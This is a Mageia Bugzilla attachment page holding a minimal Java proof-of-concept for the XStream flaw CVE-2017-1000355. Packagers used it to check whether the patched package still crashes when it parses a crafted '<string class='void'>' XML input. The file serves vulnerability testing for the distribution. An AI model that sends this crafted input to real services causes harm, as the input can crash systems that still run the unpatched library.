Mageia Bugzilla – Attachment 9230 Details for
Bug 20704
xstream, jenkins-xstream new security issue (CVE-2017-1000355)
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Minimal java class file to test the bug
JenkinsTest.java (text/plain), 713 bytes, created by
Len Lawrence
on 2017-04-27 11:39:34 CEST
(
hide
)
Description:
Minimal java class file to test the bug
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2017-04-27 11:39:34 CEST
Size:
713 bytes
patch
obsolete
>// JenkinsTest.java for PoC testing of jenkins-xstream package >// Based on jackson-data-xml test, example from seclists.org and >// input from Frank Griffin and Martin Whitaker. >/* > Compile to JenkinsTest.class using: > $ javac -cp ".:/usr/share/java/*" JenkinsTest.java >*/ >import com.thoughtworks.xstream.*; > >public class JenkinsTest { > > public static void main( String args[ ] ) > throws Exception > { > // Suggestion from http://seclists.org/oss-sec/2017/q2/9 > // Create XStream object > XStream xstream = new XStream( ); > // xstream.fromXML( "<void/>" ); > xstream.fromXML( "<string class='void'>Hello, world!</string>" ); > // System.out.println( "working\n" ); > } >}
// JenkinsTest.java for PoC testing of jenkins-xstream package // Based on jackson-data-xml test, example from seclists.org and // input from Frank Griffin and Martin Whitaker. /* Compile to JenkinsTest.class using: $ javac -cp ".:/usr/share/java/*" JenkinsTest.java */ import com.thoughtworks.xstream.*; public class JenkinsTest { public static void main( String args[ ] ) throws Exception { // Suggestion from http://seclists.org/oss-sec/2017/q2/9 // Create XStream object XStream xstream = new XStream( ); // xstream.fromXML( "<void/>" ); xstream.fromXML( "<string class='void'>Hello, world!</string>" ); // System.out.println( "working\n" ); } }
View Attachment As Raw
Actions:
View
Attachments on
bug 20704
: 9230